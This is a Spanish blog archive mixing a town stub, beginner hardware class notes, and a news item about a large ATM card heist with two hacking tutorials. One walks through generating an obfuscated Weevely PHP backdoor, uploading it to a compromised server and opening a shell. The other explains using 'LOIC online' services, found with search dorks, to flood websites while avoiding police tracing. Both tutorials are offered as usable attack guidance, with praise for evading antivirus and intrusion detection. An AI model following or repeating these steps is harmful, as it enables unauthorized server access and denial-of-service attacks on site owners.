martes, 10 de noviembre de 2015

Villamartín

Villamartín es un municipio español de la provincia de Cádiz,Andalucía. En el año 2012 contaba con 12.394 habitantes. Su extensión superficial es de 210.3 km² y tiene una densidad de 59,56 hab/km². Sus coordenadas geográficas son 36º 52' N, 5º 38' O, en el centro de la Sierra de Cádiz. Se encuentra situada a una altitud de 167 metros y a 80 kilómetros de la capital de provincia, Cádiz.

martes, 30 de septiembre de 2014

Unidad 1.Consejos de Seguridad y Instalación de un Componente .Parte 3

Consejos de un Estudiante de informática [Resumen Tema]

Para trabajar optimamente debemos tener varios conceptos , tenemos que tener un grado medio de limpieza y orden para trabajar con nuestro ordenador de una manera eficiente ,sin distracciones y organizado, ordenado e iluminado. En el caso de abrir el ordenador  RECUERDA que tiene bordes afilados.  La FUENTE y MONITORES operan con voltajes PELIGROSOS , no deberíamos manipular, en algunos casos especiales como servidores de gran potencia permite hacer algunos cambios en caliente podemos prevenir las cargas electrostáticas con conexiones a tierra así no dañar ningún componente  ,  no se debería usar fuerza excesiva al instalar componentes.

Instalación de un Componente .

Los pasos más básicos para cambiar un componente, primero apagamos el pc, después se suele desconectar de la luz y asegurarse, retiramos la carcasa del ordenador,localizamos el lugar donde tenemos que cambiar el periferico. 

Unidad 1. Hardware de un ordenador personal. Parte 2.

Existen muchos tipos de computadoras. ¿qué hace que una sea mejor que otra?
Los componentes.
Los periféricos.
Algunos de los elementos que deben tenerse en cuenta al adquirir una computadora son los siguientes (COMPONENTES):
  • la motherboard o placa base
  • el procesador o microprocesador o CPU
  • la RAM
  • el almacenamiento
  • Las tarjetas adaptadoras,
  • el gabinete o carcasa
  • y las opciones de suministro de energía (fuente de energía).

¿Para qué sirve cada uno de estos componentes? ¿Cómo los definirías? ¿qué los caracteriza?
En nuestro ordenador, los datos de programas y usuarios deben estar almacenados en algún lugar. ¿Qué tipos de almacenamiento tenemos?
  • Dispositivos magnéticos:almacenan la información mediante campos magnéticos (discos duros, cintas, disquetes...).
  • Unidades ópticas: usan rayos láser para registrar la información mediante la creación de distintas densidades ópticas (CD, DVD, Blue-Ray...).
  • Memorias estáticas y tarjetas de memoria: utilizan chips de memoria (pendrive...)

Recuerda:
Los PERIFÉRICOS agregan funcionalidad al ordenador ampliando sus capacidades.
¿Qué periféricos conoces?

Unidad 1. Hardware de un ordenador personal. Parte 1

Empezamos esta primera unidad y vamos a repasar los aspectos más importantes que hemos visto en clase:

Para que una computadora funcione deben funcionar de manera coordinada:
  • El hardware.
  • El Sistema operativo.
  • Software de aplicación(de uso general o de uso comercial/industrial. De red o local.)
Existen muchos tipos de computadoras. Una clasificación es la siguiente:
  • Computadoras centrales
  • Servidores
  • Computadoras de escritorio
  • Estaciones de trabajo
  • Computadoras portátiles
  • Dispositivos portátiles de mano
Recuerda qué caracteriza a cada una y la diferencia del resto.

Dentro del ordenador, la información se representa mediante el sistema de numeración binario, es decir, mediante 0's y 1's. (Debido a que inicialmente existían 2 estados eléctricos básicos. Tensión y ausencia de tensión).

La unidad básica de información es el bit o BInary digiT. Viene de la expresión inglesa de dígito binario. Como el bit es una unidad de medida tan pequeña, se usan medidas de unidades superiores. El byte es el conjunto de 8 bits.

Uno de los códigos más utilizados para representar la información (intermedio entre nosotros, nuestro alfabeto y el código que usa el ordenador,binario) es el código ASCII.

Casi todos los sistemas informáticos actuales utilizan el código ASCII o una extensión compatible para representar textos y para el control de dispositivos que manejan texto como el teclado.

Partiendo de lo anterior, hemos aprendido cuáles son las unidades de medida de capacidad de almacenamiento en informática:
1 bit = {0, 1}
1 Byte = 8 bit
1 KB = 1024 bytes
1 MB = 1024 KB
1 GB = 1024 MB
1 TB = 1024 GB
...

Una ventaja de la información digital es que se puede transmitir a grandes distancias sin que afecte a la calidad.

Los medios que utilizaremos para transmitir la información y que veremos a lo largo de este curso son:
  • Cables
  • Fibra óptica
  • Tecnología inalámbrica
También hemos calculado el tiempo estimado de descarga de un archivo en condiciones óptimas. Recordemos que este tiempo se ve influido por el tipo de conexión, la velocidad del procesador, las interferencias...

La velocidad de transferencia de datos se mide:
Miles de bits x segundo (kbps o kb/s)
Millones de bits x segundo (Mbps o Mb/s)

El tiempo de descarga se calcula dividiendo el tamaño del archivo por la velocidad de transferencia de datos. Recuerda que debemos utilizar las mismas unidades.

Otras unidades de medida que hemos visto brevemente son:
  • Resolución de pantalla: número de píxeles que puede ser mostrado en la pantalla. Viene dada por el producto del ancho por el alto. Por ejemplo 1024x600.
  • Frecuencias analógicas: la unidad de frecuencia del Sistema Internacional de Unidades es el Hercio o Hertz.
Con el Hertz medimos la velocidad con que cumple un ciclo o se actualiza.

martes, 2 de julio de 2013

Tutorial.-Weevely

Weevely Backdoor





Weevely es una herramienta de post-explotación de web , con la que conseguir acceso a un servidor por completo.

Los nuevos módulos para la nueva version 0.7 son

  • More than 30 modules to automatize administration and post exploitation

  1. Ejecutar comandos y navegue sistema de archivos remoto, incluso con restricción de seguridad de    PHP.
  2. Auditoría de errores de configuración de servidor comunes.
  3. Ejecutar consola SQL pivotante en la máquina de destino.
  4. Abrir proxy HTTP para hacer un túnel a través de su tráfico de destino.
  5. Fácil transferencia de archivos desde y hacia el objetivo.
  6. Engendro conchas TCP inversa y directa.
  7. Fuerza bruta las contraseñas de los usuarios del sistema de destino.
  8. Ejecutar escaneo de puertos de equipo de destino.
  9. Comunicaciones de puerta trasera se ocultan en las cookies HTTP.
  10. Las comunicaciones son ofuscado para eludir la detección NIDS firma.
  11. Backdoor código polimórfico PHP se ofusca para evitar HIDS detección AV.
  12. etc....=)Bu
 ¿Donde lo Descargamos ? 
Bueno , hay varias formas, yo os dire que lo podeis clonar con "git", lo que yo hize , ponemos este comando para clonarlo....
 git clone https://github.com/epinna/Weevely Weevely
 Bueno, es sencillo no? colocan eso y weevely estara en su carpeta llamada Weevely, sencillo? por si no les gusta esta forma acá les dejo la web  , para que escojan la suya 
http://epinna.github.io/Weevely/
 Usando Weevely.

Bueno entramos en la carpeta, y para hacer un pequeño backdoor , sencillito , colocamos lo siguiente : 
 Python weevely.py generate "Contraseña"  "Ruta del archivo"
Bueno, con eso , hariamos un backdoor, un ejemplo seria así : 


Python weevely.py generate hacker /home/icebreaker/Escritorio/backdoor.php

y así lo creamos , lo subimos al servidor infectado , una vez hecho esto  para conectarnos, lo hacemos de la siguiente forma con el siguiente comando...
 python weevli "web+el backdoor" "contraseña"
Y así conseguimos una shell , probamos poniendo ls .......


Bueno , y acá se puede ver conectado espero que les gustes y happy hacking! :-D




miércoles, 22 de mayo de 2013

Noticia.-Mayor Ciberrobo de la historia.



Ocho miembros de un equipo de ciberdelincuentes han sido acusados ​​del mayor robo bancario de la historia, en una operación cuidadosamente coordinada en la que consiguieron un botín de 45 millones de dólares.
Según la información los ciberdelincuentes piratearon las redes de un procesador de tarjetas Mastercard de crédito y débito pre-pagadas (dos bancos de Emiratos Árabes Unidos) para falsificar las mismas y robar en unas pocas horas 45 millones de dólares.
La operación denominada ‘Unlimited Operation’ (por los beneficios ilimitados que potencialmente podría obtener) estaba perfectamente coordinada y se realizó en miles de cajeros automáticos de una veintena de paísesdefraudando directamente al operador sin afectar a cuentas personales.
“En lugar de armas y máscaras, esta organización criminal utilizó ordenadores e Internet… Moviéndose tan rápido como los datos en Internet, la organización se hizo camino desde los sistemas informáticos de corporaciones internacionales a las calles”ha explicado el fiscal que lleva el caso, destacando la “precisión quirúrgica” de los ciberdelincuentes y su capacidad para distribuir miles de tarjetas falsas en una veintena de países.
Siete de ellos han sido detenidos ya y el octavo, se cree el líder de esta banda internacional, fue asesinado a finales del mes de abril en República Dominicana. La investigación continúa en marcha.

Tutorial.-Ataques Ddos Online.

Bueno chicos! :-D Hola!....
(Este post lo pongo por rellenar... XD ya se habrán dado cuenta...)

No , hombre es que a día de hoy algunas personas no saben que se pueden montar servicios de web que atacan a servidores (Estilo Loic Online ) yo explicare que son y quienes lo utilizan .....empecemos ! Go Go Go!

¿Que es un Ddos Online?
Son servicios como ya dije que se montan en servidores generalmente para el ataque de servicios, puertos...etc :-D Online , ¿Por que? , porque imagínate por un segundo que a ese ddos online, entran 100 personas al día , y tu eres una de ellas y tiras una web con ese ddos online, en el caso de denuncia y de todo la pesca , y cojan algo sera la ip del servidor, con la que no podrán hacer nada , ya que , se meten muchas personas diariamente ... Policía -> }:-( .....
¿Quienes lo utilizan?
Hay varios tipos de personas, lo utilizan desde ciberhacktivistas a gobiernos...así que estos ataques tienen tela, bueno , se conocieron muchos el ejemplo que di antes de "Loic Online" Creado por los ciberhacktivistas de anonymous atacaban reuniendose mucha gente , ahora una pregunta que alguno se estara haciendo, ¿Si los de anonymous hacian ese ataque cojian al que contrataban el servidor? Lógicamente...no .... hackeaban y subian ese loic.... }:-| bueno, expliquemos como lo encontramos, uno podemos encontrarlo, poniendo en google o bing, loic online ...te saldran un inmenso numero de paginas dedicadas a este servicio...

Vieron? ....sencillo no? , también podríamos usar algún dorks , por ejemplo inurl:/loic-online/ , o cualquier cosa  , que se les ocurra, no se ...bueno abriremos algún loic .. el típico de anonymous...

Bueno hay ponen la url , y empezara a floodearlo , tengan en cuenta que esto con uno solo es muy complicado, lo que podrían hacer es abrir varios (Ddoser online) , pero aun así seria muy muy complicado, hay una botnet , que lo que hace es buscar estas web, las añade y cuando tu quieres atacar una web, si tienes recolectado 20.000 web como estos (DDOS), pues le das a atacar y le hacen un ddos las 20.000 web's ...entonces si suele caer XD jajaja, ya are el post sobre esta botnet :-D , bueno chicos espero que lo hallan entendido todos y que no tengan problemas....

Salu2 y que no os ddoseen :-D